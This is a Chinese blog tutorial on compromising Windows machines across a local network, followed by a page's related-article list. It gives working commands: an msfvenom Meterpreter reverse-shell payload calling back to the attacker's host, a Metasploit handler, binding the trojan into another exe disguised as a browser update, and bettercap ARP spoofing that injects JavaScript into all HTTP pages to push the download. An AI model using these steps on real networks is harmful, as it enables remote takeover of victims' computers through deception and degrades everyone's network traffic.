目的

  通过Arp欺骗, 给局域网内的所有用户网页中植入木马, 只要用户运行以后, 就会反弹一个shell到我们计算机

  准备

  kali系统

  metaspolit的使用

  Arp欺骗工具:bettercap

  博客园账号密码(用来上传小马文件)

  metaspolit小马的准备

  因为我本地的ip为151, 溢出后反弹的端口为444, 使用msfvenom生成名字为run1.exe的小马文件:

msfvenom -p  windows/meterpreter/reverse_tcp LHOST=192.168.1.151 LPORT= -f exe > run1.exe

  

  文件是生成了,再把生成的小马文件和其它exe合并, 避免用户下载文件的时候起疑, 我使用exebind这个老工具:

  把生成的exe文件放到服务器上, 我是把文件压缩以后, 放到博客园的个人空间上, 文件名字改为浏览器更新程序, 用户就会以为要更新文件, 然后去下载并打开这个文件

  打开msf的控制台,开始监听本地的端口

use exploit/multi/handler
set lhost 192.168.1.151
set lport
set payload windows/meterpreter/reverse_tcp
exploit

  bettercap执行Arp欺骗

  bettercap参考官网, 此处省略1W字, 使用bettercap的添加html模块, 给所有的HTTP页面添加JS代码, 当用户点击body标签的时候 , 自动打开新窗口并下载一个exe文件, 命令行的参数最好添加-G指定网关, 添加-T添加攻击主机, 如果没有指定-T参数, 会欺骗局域网内部的所有设备, 欺骗越多, 别人越卡:

sudo bettercap -I wlan0 -X  -T 192.168.1.150  -G 192.168.1.1  --proxy-module=injecthtml --html-data "<script>document.body.onclick = function(){window.open('http://files.cnblogs.com/files/diligenceday/update.zip')} </script>"

  只要用户浏览器网页的时候, 下载了exe文件,并打开了该exe文件, 那么, 我们的kali机器会收到一个反弹的shell, 剩下的就是为所欲为了

  欺骗全部计算机:

  如果相对局域网内部的所有计算下手 ,bettercap的命令不用指定目标机器的IP, 如果被攻击的局域网流量比价高的情况下,这个局域网的网络会非常卡, 因为所有的流量都会走本地的kali机器, 测试代码如下:

sudo bettercap -I wlan0 -X -G 192.168.1.1  --proxy-module=injecthtml --html-data "<script>document.body.onclick = function(){window.open('http://files.cnblogs.com/files/diligenceday/update.zip')} </script>"

  问题:

  因为Arp欺骗的缘故, 导致被攻击的机器, 浏览网页的速度超级慢

  如果用户浏览器网页的时候, 如果走的是Https协议的话 , 无法添加自定义代码到Html页面中

  放在服务器上的小马文件, 最好要把http改成https, 否者, 用户下载文件的时候非常慢

  本次渗透只是拿我的虚拟机进行个人测试,并没有搞破坏

  在虚拟机的情况下, 直接外接usb无线网卡, 然后把网桥关闭, 避免bettercap的arp -a的时候出问题

  需要攻击的时候,最好指定目标电脑的IP地址和局域网网关, 会更加保险, 确保能够攻击, 如果bettercap一条信息都没有嗅探到, 就要看看是不是哪里出问题了

  如果要攻击一整个局域网的时候, 最好把需要攻击的电脑先ping通, 避免kali系统没找到路由表信息, 出现漏网之鱼

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329

微信:18101055830

厦门点燃未来网络科技有限公司, 是厦门最好的微信应用, 小程序, 微信网站, 公众号开发公司

kali系统:局域网arp欺骗, 搞定任意windows计算机的更多相关文章

  1. Kali实现局域网ARP欺骗和ARP攻击

    原文地址: http://netsecurity.51cto.com/art/201303/386031.htm http://xiao106347.blog.163.com/blog/static/ ...

  2. 局域网 ARP 欺骗原理详解

    局域网 ARP 欺骗原理详解 ARP 欺骗是一种以 ARP 地址解析协议为基础的一种网络攻击方式, 那么什么是 ARP 地址解析协议: 首先我们要知道, 一台电脑主机要把以太网数据帧发送到同一局域网的 ...

  3. unity3D 搞定任意ios插件

    原地址:http://www.cnblogs.com/U-tansuo/archive/2012/11/22/unity_ios-plugin.html 说起unity调ios插件,好多淫比较头痛,探 ...

  4. 使用ARP欺骗, 截取局域网中任意一台机器的网页请求,破解用户名密码等信息

    ARP欺骗的作用 当你在网吧玩,发现有人玩LOL大吵大闹, 用ARP欺骗把他踢下线吧 当你在咖啡厅看上某一个看书的妹纸,又不好意思开口要微信号, 用arp欺骗,不知不觉获取到她的微信号和聊天记录,吓一 ...

  5. kali Linux 渗透测试 | ARP 欺骗

    目录 ARP 欺骗及其原理 ARP 欺骗实施步骤 必备工具安装 nmap 工具 dsniff 工具 driftnet 工具 ettercap 工具 ARP 欺骗测试 ARP 断网攻击 ARP 欺骗(不 ...

  6. kali 下使用 arpspoof 实现 ARP 欺骗

    ARP 欺骗: 一种中间人攻击,攻击者通过毒化受害者的 ARP 缓存,将网关的 MAC 替换成攻击者的 MAC ,于是攻击者的主机实际上就充当了受害主机的网关, 之后攻击者就可以截获受害者发出和接到的 ...

  7. 华为海思搞定4K60fps!Vmate掌上云台相机国内首发

    目录 Snoppa Vmate Snoppa Vmate Snoppa Vmate是一款掌上型的高性能4K摄像机,集成了微型机械三轴增稳云台,一体化机身集成可操控式触摸屏,既可以独立使用,也可以无线连 ...

  8. kali Linux 渗透测试 | ettercap图形界面(ARP 欺骗 + DNS欺骗)

    上次我们使用 arpspoof 工具在命令行中完成了 arp 欺骗实验,今天我们用另一种工具 ettercap 工具来实现.ettercap支持图形化操作,对新手非常友好,并且操作非常简单, ette ...

  9. bat批处理文件搞定所有系统问题

     bat批处理文件搞定所有系统问题  分类: WINDOWS   -----------bat批处理文件搞定所有系统问题---------   一.查漏补缺——给系统功能添把火  我们的操作系统虽然功 ...

随机推荐

  1. linux的文件权限与目录配置<----->第二章

    1.Linux文件属性    [   1  ]                  [   2  ] [    3    ]  [    4    ]  [ 5 ]             [ 6 ] ...

  2. 一.CPU,Mem过高怎么办 --这是个开始

    本身是名Java开发,在做了一段大数据的工作后,猛然间想对Java做个总结. 从未写过技术博客,一时不知如何开始,思虑后,暂且以自己喜爱的方式来开篇. 工作中遇到过CPU或内存过高的问题,解决步骤: ...

  3. .net core 项目文件结构浅析

    1:launch.json (配置调试用的) 通过vs code创建的项目,都会有这个文件,是启动调试的配置文件: (vscode默认支持nodejs调试) 要调试调试c#代码  需要安装 C# 插件 ...

  4. 阿里云有对手了!CDN横评:腾讯云优势明显

    如今,云计算产品越来越多,像国内的BAT三大巨头都提供了云主机(腾讯云CVM.阿里云ECS.百度云BCC),另外还有存储.数据库.安全等相关云服务.在这其中,CDN也是一项重要的云服务,CDN指的是内 ...

  5. ASP.NET前台table通过Ajax获取绑定后台查询的json数据

    上一篇<ASP.NET前台html页面AJAX提交数据后台ashx页面接收数据>写了前台提交数据后台保存到数据库,数据处理以后用户肯定要查询.接下来就写一个前台table通过ajax  J ...

  6. 虚拟机下克隆3个centos系统并配置IP访问网络(转载)

    此文是保证linux系统能够上网 先查看本机的IP 打开虚拟机,更改虚拟机为桥接方式 在第一个虚拟机上打开终端,在命令行输入setup,选择NETWORK CONFIGRATION 回车后, 配置IP ...

  7. spring Bean类自动装载实现

    先贴spring的开发文档,有助于大家学习http://shouce.jb51.net/spring/beans.html#beans-factory-class 一直想研究一下spring bean ...

  8. 无法远程连接服务器上的mysql

    使用mysql管理工具连接服务器删过得mysql,显示连接被拒绝,但是在服务器上是可以登录mysql的. 无法远程连接通常以下几种情况: 首先,关闭mysql.        service mysq ...

  9. noip冲刺赛第五次考试

    1.公约数 (gcd.cpp\c\pas) [问题描述] 给定一个正整数,在[1,n]的范围内,求出有多少个无序数对(a,b)满足 gcd(a,b)=a xor b. [输入格式] 输入共一行,一个正 ...

  10. Javascript随笔2(JQuery)

    1.jQuery 语法 Tips: 通过 CDN(内容分发网络)引用JQuery:(link的引用最好放在script的引用之前) <script src="http://apps.b ...